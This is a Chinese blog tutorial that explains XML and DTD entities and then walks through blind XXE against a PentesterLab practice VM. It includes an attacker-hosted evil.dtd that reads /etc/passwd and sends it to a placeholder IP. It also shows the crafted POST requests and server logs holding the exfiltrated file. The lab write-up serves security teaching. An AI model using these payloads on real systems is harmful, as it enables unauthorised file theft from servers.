XXE漏洞及Blind XXE练习

最新推荐文章于 2024-05-29 16:45:37 发布

Shinpachi8

最新推荐文章于 2024-05-29 16:45:37 发布

阅读量4.3k

点赞数 1

分类专栏： WEB漏洞文章标签：漏洞

本文链接：https://blog.csdn.net/Shinpachi8/article/details/53456437

版权

WEB漏洞专栏收录该内容

2 篇文章 0 订阅

订阅专栏

如果有问题请您指正。

XML基础

xml 是可扩展标记语言(EXtensible Markup Language)的缩写。它与HTML类似同为w3c推荐标准，但是比HTML要严谨。因为它所有的标签一定要闭合。同时它也可以用自己定义的标签，但是XML是不作为的标记语言，不像HTML，XML只是将数据结构化存储与传输。 w3cschool－xml的教程

XML有关的几点：

所有XML都必须要有关闭标签。
```
    <note> this's note example <note>
```

所有XML的标签对大小写敏感

<Message> i've something to tell u </Message>
<message> the '<Message>' is different with '<message>' </message>
<!-- 在XML里不允许出现 <|>|'|"|& 五个符号，上边出现是为了演示方便。 -->

XML的属性值必须加引号


<!-- wrong example -->

<note data=8/2/16/> </note>

<!-- right example -->

<note data="08/02/16"> </note>

在XML中有五个符号需要实体引用

实体引用符号中文解释
< < 小于号
> > 大于号
& & 和号
' ' 单引号
" " 双引号

实体引用	符号	中文解释
`<`	`<`	小于号
`>`	`>`	大于号
`&`	`&`	和号
`'`	`'`	单引号
`"`	`"`	双引号

DTD验证

DTD是文档类型定义(Document Type Define)的缩写，其作用是定义XML文档的合法构建模块。 W3C School DTD 教程. DTD实体变量在使用是以&开头，以;结束

DTD 举例说明

在内部

语法如下:

<!-- This's a DTD example in XML file -->
<?xml version="1.0"?>
<!DOCTYPE note [
    <!ELEMENT note (to, from, heading, body)>
    <!ELEMENT to (#PCDATA)>
    <!ELEMENT from (#PCDATA)>
    <!ELEMENT heading (#PCDATA)>
    <!ELEMEhhNT body (#PCDATA)>
]>
<note>
    <to> jxy </to>
    <from> jxy </from>
    <heading> Remider </heading>
    <body> Don't forgot working hard </body>
</note>

!DOCTYPE note 定义此文档是note类型的文档
!ELEMENT note 定义note元素有四个元素 : to,from,heading, body
!ELEMENT to|from|heading|body 定义to|from|heading|body元素为#PCDATA 类型

外部文档声明

语法如下:

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
    <to> jxy </to>
    <from>  jxy </from>
    <heading> Remeber </heading>
    <body> Don't forgot work hard </body>
</note>

<!-- note.dtd 
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
-->

DTD 解释
所有的XML以为HTML文档均为以下简单的构建模块构成.

元素属性实体 PCDATA CDATA
同上同上同上 PCDATA是会被解析器解析的文本，这些文本将会被解析器检查实体与标记。 CDATA是不会被解析器解析的文件。

重点在于 DTD中的实体声明。这是XXE洞的基础。其中SYSTEM|PUBLIC是两种状态，一是私有的，另外一个是公有的。可参考这篇文章
- 一个内部实体的声明
```
<!ENTITY 实体名 "实体的值" >

<!ENTITY write "Shinpachi8" >
<!ENTITY copyright '@Shinpachi8'>


<!ENTITY %foo1 SYSTEM "foo1">

%foo1;
```
- 一个外部实体的声明。
```
<!ENTITY 实体名 SYSTEM|PUBLIC "url/uri">

<!ENTITY writer SYSTEM "http://xxx.com">
<!ENTITY copyrite PUBLIC '../xx.dtd'>


<!ENTITY %foo1 SYSTEM "file:///etc/passwd">
<!ENTITY %foo2 SYSTEM "http://127.0.0.1/id=%foo1;">
```
- CDATA 解释
  这里稍微解释一下CDATA的内容。如上所说CDATA是不应由XML解析器进行解析的文本数据 (Unparsed Character Data)。在CDATA中，即使’<>&’符号也不会产生错误。CDATA部分由<![CDATA[开始，由]]>结束。但是CDATA部分不能包含字符串]]>。如下.
```
<script>
<![CDATA[
function matchwo(a, b){
    if (a < b && a < 0) then
    {
        return 1;
    }
}
]]>
</script>
```

元素	属性	实体	PCDATA	CDATA
同上	同上	同上	PCDATA是会被解析器解析的文本，这些文本将会被解析器检查实体与标记。	CDATA是不会被解析器解析的文件。

XXE 漏洞

OWASP关于XXE的一些文档:
1. Testing for XML Injection
2. XML External Entity (XXE) Prevention Cheat Sheet

另外还有一些关于XXE的CTF：
1.GoSecure CTF
2.HACK YOU 2014

现在这一部分是由PENTEST LAB的XXE练习来总结的。也参考了以上的内容。

在pentest lab 上下载iso镜象并安装至VIRTUAL BOX上。打开网页是一个登录界面。
用BURPSUITE做代理得如下。

用xml的实体来试。
输入为：

POST /login HTTP/1.1
Host: 10.108.40.26
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.108.40.26/login
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 37

<?xml version="1.0"?>
<foo>xxe

虽然请求内容为非正常的XML, 但是回复与上图相同。原因在于Content-Type请求头未设置。即如果请求为：

POST /login HTTP/1.1
Host: 10.108.40.26
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.108.40.26/login
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 31

<?xml version="1.0"?>
<foo>xxe

那么响应为：

<p id="detail">
    For request 'POST /login' [Invalid XML]
</p>

可以看出是有XML问题的。但是如果请求一个正常的XML格式，返回的内容与图一致。即这是一个Blind XML. 需要一个带外数据通道来显未数据。

Blind XXE

首先在攻击者的服务器建一个DTD的数据格式文件。其内容为：

<!ENTITY %file SYSTEM "file:///etc/passwd">
<!ENTITY %request "<!ENTITY foo SYSTEM 'http://your.IP/id=%file;'>">
%request;

在LOGIIN时POST数据更改为:

POST /login HTTP/1.1
Host: 10.108.40.26
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.108.40.26/login
Connection: keep-alive
Content-Type: text/xml
Upgrade-Insecure-Requests: 1
Content-Length: 98

<?xml version="1.0"?>
<!DOCTYPE xxe SYSTEM "http://10.108.41.62:8000/evil.dtd">
<xxe>foo</xxe>

此时会在攻击的本地生成一条请求记录如下：

10.108.40.26 - - [04/Dec/2016 20:13:47] "GET /evil.dtd HTTP/1.1" 200 -

即这时我们已经成功的进行了请求。如果把请求内容改成。这里&符号后边的foo，对应的是自己写的DTD文件中的foo

<?xml version="1.0">
<!DOCTYPE xxe SYSTEM "http://10.108.41.62:8000/evil.dtd">
<xxe>&foo;</xxe>

刚在攻击者日志会显示：

10.108.40.26 - - [04/Dec/2016 20:19:40] "GET /evil.dtd HTTP/1.1" 200 -
10.108.40.26 - - [04/Dec/2016 20:19:40] "GET /?id=root:x:0:0:root:/root:/bin/sh%0Alp:x:7:7:lp:/var/spool/lpd:/bin/sh%0Anobody:x:65534:65534:nobody:/nonexistent:/bin/false%0Atc:x:1001:50:Linux%20User,,,:/home/tc:/bin/sh%0Apentesterlab:x:1000:50:Linux%20User,,,:/home/pentesterlab:/bin/sh%0Aplay:x:100:65534:Linux%20User,,,:/opt/play-2.1.3/xxe/:/bin/false%0Amysql:x:101:65534:Linux%20User,,,:/home/mysql:/bin/false%0A HTTP/1.1" 200 -